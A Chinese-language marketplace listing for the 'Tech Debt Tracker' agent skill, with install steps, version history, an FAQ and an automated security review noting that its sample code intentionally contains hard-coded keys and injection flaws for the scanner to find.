← 返回 Skills 市场
Tech Debt Tracker
作者
Alireza Rezvani
· GitHub ↗
· v2.1.1
· MIT-0
702
总下载
0
收藏
3
当前安装
2
版本数
在 OpenClaw 中安装
/install tech-debt-tracker
功能描述
Scan codebases for technical debt, score severity, track trends, and generate prioritized remediation plans. Use when users mention tech debt, code quality,...
安全使用建议
This skill seems to implement a legitimate tech-debt scanning + prioritization workflow, but exercise caution before running it against real repositories or adding it to CI:
- Review the scanner/prioritizer/dashboard scripts (scripts/debt_scanner.py, scripts/debt_prioritizer.py, scripts/debt_dashboard.py) before running. Search them for any code that sends data to external hosts (HTTP POST/PUT to remote endpoints, or explicit uploads). If you can't review the full source, don't run it on sensitive projects.
- The package contains sample application code with hard-coded secrets (Stripe/PayPal/Square keys, a DATABASE_URL, API_KEY values). Treat these as samples only — do not assume they are safe or valid credentials. If you plan to publish or share results, remove or redact sample secrets first.
- Run the tools in an isolated environment (sandbox or VM) and on a non-sensitive copy of your repository first. Verify outputs locally before enabling any integrations that post reports to Jira/Slack/GitHub or other external services.
- If you will integrate into CI, require explicit configuration of connectors and inspect any code that performs automatic uploads. Only provide external-service credentials to the integrations you explicitly configure, and prefer ephemeral/scoped tokens.
What would change this assessment: viewing the full content of the scripts to confirm there are no hidden exfiltration paths (e.g., hardcoded webhook URLs, telemetry uploads, or automatic remote POSTs), and confirmation from the author that included secrets are purely illustrative and that connectors are opt-in and authenticated only by user-provided credentials.
功能分析
Type: OpenClaw Skill
Name: tech-debt-tracker
Version: 2.1.1
The tech-debt-tracker bundle is a legitimate toolset designed to identify and manage technical debt. While the included sample codebase (e.g., `payment_processor.py`, `user_service.py`, and `frontend.js`) contains numerous critical vulnerabilities such as hardcoded API keys, database credentials, and SQL injection risks, these are explicitly labeled as intentional examples of 'debt' for the scanner to detect. The core logic in `debt_scanner.py`, `debt_prioritizer.py`, and `debt_dashboard.py` focuses on static analysis, scoring, and reporting without any evidence of malicious intent, data exfiltration, or unauthorized command execution.
能力评估
Purpose & Capability
The name/description describe a code-scanning + prioritization + dashboard tool, and the repository contains scanner, prioritizer, and dashboard scripts that align with that purpose. However, the assets include sample application code (payment_processor.py, user_service.py, frontend.js) containing hard-coded API keys, database URLs, and calls to external payment APIs. Those sample files may be intended as inputs for the scanner, but they are not required by the scanner itself and introduce unexpected sensitive-looking data into the package.
Instruction Scope
SKILL.md and README instruct the agent/operator to run local Python scripts (e.g., python scripts/debt_scanner.py /path/to/codebase) and to integrate scanning into CI. The instructions do not explicitly tell the agent to read system-wide config, arbitrary host files, or to POST results to unexpected remote endpoints. That said, the README references optional integrations (Jira/GitHub/Chat systems) and an example automated-reporting bash snippet — those integrations would require external configuration and could send scan outputs off-host if enabled.
Install Mechanism
There is no install specification (instruction-only skill). No packages are pulled or arbitrary URLs downloaded by the skill manifest itself, minimizing installer risk. The risk surface comes from running the included scripts locally.
Credentials
The skill declares no required environment variables or credentials, but multiple included sample/source files contain hard-coded secrets and connection strings: e.g., stripe_key/paypal_key/square_key in assets/sample_codebase/src/payment_processor.py, API_KEY and DATABASE_URL in assets/sample_codebase/src/user_service.py, and API_KEY in frontend.js. Those secrets are not justified by the skill manifest (the scanner should not need them) and could be confusing or accidentally used. Presence of calls to external endpoints (api.stripe.com, api.paypal.com, connect.squareup.com, API_BASE_URL in frontend.js) in sample code is expected for a payment example but means the repository contains code that, if executed, would make network calls using embedded credentials.
Persistence & Privilege
The skill does not request permanent presence (always: false) and is user-invocable. It does not declare modifications to other skills or system-wide settings. Autonomous invocation is allowed (disable-model-invocation: false) which is platform default; this combination is not, by itself, an additional red flag given other issues.
如何使用
- 确保已安装 OpenClaw(本地或 Docker 部署)
- 在对话框中输入安装命令:
/install tech-debt-tracker - 安装完成后,直接呼叫该 Skill 的名称或使用
/tech-debt-tracker触发 - 根据 Skill 的参数说明提供必要输入,即可获得结构化输出
版本历史
v2.1.1
v2.1.1: optimization, reference splits
v1.0.0
Initial release
元数据
常见问题
Tech Debt Tracker 是什么?
Scan codebases for technical debt, score severity, track trends, and generate prioritized remediation plans. Use when users mention tech debt, code quality,... 它是一个面向 Claude Code / OpenClaw 的 AI Agent Skill 插件,目前累计下载 702 次。
如何安装 Tech Debt Tracker?
在 OpenClaw 或 Claude Code 对话框中运行命令「/install tech-debt-tracker」即可一键安装,无需额外配置。
Tech Debt Tracker 是免费的吗?
是的,Tech Debt Tracker 完全免费,采用 MIT-0 许可证,可自由下载、安装和使用。
Tech Debt Tracker 支持哪些平台?
Tech Debt Tracker 跨平台运行,可在任意部署了 OpenClaw / Claude Code 的环境中使用(cross-platform)。
谁开发了 Tech Debt Tracker?
由 Alireza Rezvani(@alirezarezvani)开发并维护,当前版本 v2.1.1。
推荐 Skills